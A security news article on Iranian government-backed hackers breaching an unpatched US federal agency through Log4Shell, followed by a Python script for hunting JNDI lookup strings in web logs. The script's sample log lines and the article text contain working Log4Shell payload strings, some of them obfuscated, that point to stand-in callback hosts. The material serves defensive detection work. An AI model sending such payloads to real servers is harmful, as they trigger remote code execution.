Log4Shell vulnerability exploited by Iranian hackers to breach US federal agency
Iranian government-backed hackers have been blamed for compromising a U.S. federal agency. According to reports, the attackers exploited the Log4Shell vulnerability, which the agency had failed to patch. The flaw was publicly disclosed on 9 December 2021, almost a year ago, and the failure to remediate it in time is what led to the breach.
Log4Shell (CVE-2021-44228, rated CVSS 10.0 out of 10) is a vulnerability in Apache Log4j 2, the widely used Java logging library, that leads to unauthenticated remote code execution; versions 2.0-beta9 through 2.14.1 are affected. The flaw lies in the library's lookup feature, which lets a logged string contain variables that are resolved at log time through the Java Naming and Directory Interface (JNDI), including naming and directory services such as the Lightweight Directory Access Protocol (LDAP) and the Domain Name System (DNS). Because user-controlled input (an HTTP header, a username, a chat message) is routinely written to logs, an attacker can plant a string of the form ${jndi:ldap://attacker-host/x} and make the vulnerable server contact the attacker's LDAP server and load a malicious Java class from it. Apache addressed the issue over several releases: 2.15.0 disabled message lookups by default (a fix later found to be incomplete), 2.16.0 disabled JNDI by default and removed message lookups entirely, and 2.17.0 restricted JNDI to the java protocol, so remote LDAP lookups are no longer possible, and fixed a related recursion denial-of-service bug. A widely cited analysis at the time estimated that more than 90% of enterprise cloud environments contained a vulnerable version.
The attack was confirmed by the Cybersecurity and Infrastructure Security Agency (CISA) in a joint advisory with the FBI. The agency did not name the federal civilian executive branch (FCEB) organization that was breached, but said the intrusion dated back to February 2022. The suspicious activity was first identified in April 2022, when CISA performed a retrospective analysis of data from EINSTEIN, the government-run intrusion detection system that monitors FCEB networks. CISA found that the attackers had exploited Log4Shell in an unpatched VMware Horizon server to gain access to the organization's network and escalate to administrator and SYSTEM-level privileges.
CISA had ordered all federal agencies to patch against Log4Shell by 23 December 2021 under Emergency Directive 22-02, but this agency had not done so. Once inside the network, the attackers installed XMRig, a cryptocurrency miner, moved laterally to the domain controller and ran Mimikatz, a credential harvester, to dump passwords. With the stolen credentials they created a rogue domain administrator account and then used it to disable Windows Defender on the compromised hosts, both to evade detection and to keep their access.
Why this particular agency was targeted is unclear; intrusions of this kind can serve as footholds for espionage and for more disruptive follow-on attacks. In response, CISA has warned that any organization that did not promptly patch against Log4Shell should assume it has already been compromised and begin threat hunting for the kind of malicious activity described above.
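The lookup mechanism described earlier is also what a threat hunt has to account for: attackers rarely send the literal text ${jndi:ldap://...}, because Log4j's own lookup syntax lets them assemble it at log time from nested ${lower:...}, ${upper:...} and ${env:NAME:-default} fragments, or URL-encode it. The following script is an added example for this article and is not code from the page, from CISA's advisory or from the Log4j project. It reproduces that normalisation offline, without ever performing a real JNDI lookup, and reports the scheme and callback host so a responder can pivot to firewall or DNS logs. Every log line, IP address and hostname in it is constructed for illustration.

```python
"""Hunt web-server logs for Log4Shell (CVE-2021-44228) lookup strings.

Added example for this article; it is not code from the page, from CISA's
advisory or from the Log4j project. All log lines, IPs and hostnames below
are constructed for illustration. A naive search for the literal text
"${jndi:" misses the obfuscated payloads seen in the wild, so the script
first collapses Log4j's own lookup syntax (nested ${...}, ${lower:x} and
${upper:x}, ${env:NAME:-default} fallbacks, URL encoding) and then reports
the JNDI scheme and callback host.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines: client, request, status, user-agent.
SAMPLE_LOGS = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/Exploit}"',
    '10.0.0.9 "GET /api HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${::-l}${::-d}${::-a}${::-p}://evil.example/x}"',
    '10.0.0.9 "GET /x HTTP/1.1" 200 "${jndi:${upper:r}mi://203.0.113.7:1099/obj}"',
    '10.0.0.9 "GET /%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.8%3A1389%2Fa%7D HTTP/1.1" 404 "curl/7.0"',
    '10.0.0.12 "GET /${date:yyyy} HTTP/1.1" 200 "curl/7.0"',  # benign, non-JNDI lookup
]

# Innermost lookup: ${...} whose body contains no nested braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A surviving JNDI lookup with its scheme (ldap, ldaps, rmi, dns, ...) and host[:port].
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/\s}]+)", re.I)
# Bound the loop; unbounded lookup recursion was itself a Log4j bug (CVE-2021-45105).
MAX_PASSES = 50


def _resolve_one(match: re.Match) -> str:
    """Resolve one innermost lookup the way Log4j would, minus any network access."""
    body = match.group(1)
    prefix, sep, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return match.group(0)          # keep the dangerous lookup intact for reporting
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${lookup:key:-default}: attacker relies on the default
    if sep and prefix == "lower":
        return arg.lower()
    if sep and prefix == "upper":
        return arg.upper()
    return body                        # unknown lookup (date, sys, ...): drop the ${} wrapper


def normalize(text: str) -> str:
    """Collapse nested and obfuscated lookups until only JNDI lookups (if any) remain."""
    text = unquote(text)  # %24%7Bjndi... -> ${jndi...
    for _ in range(MAX_PASSES):
        collapsed = INNER_LOOKUP.sub(_resolve_one, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(line: str) -> Optional[Dict[str, str]]:
    """Return the JNDI scheme and callback host found in a log line, or None if clean."""
    normalized = normalize(line)
    m = JNDI_LOOKUP.search(normalized)
    if m is None:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "normalized": normalized}


def hunt(lines: List[str]) -> List[Dict[str, str]]:
    """Scan log lines and return one finding per line that carries a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi(line)
        if hit is not None:
            hit["line_no"] = str(number)
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(f"line {hit['line_no']}: {hit['scheme']}://{hit['host']}  <- {hit['normalized']}")
```

The resolver deliberately does not implement every Log4j lookup (sys, java, marker and so on); unknown lookups are simply unwrapped, which is enough to expose the jndi token. Treat the output as a triage list: the callback hosts it reports are the indicators to search for in outbound LDAP, RMI and DNS traffic from the time window in question.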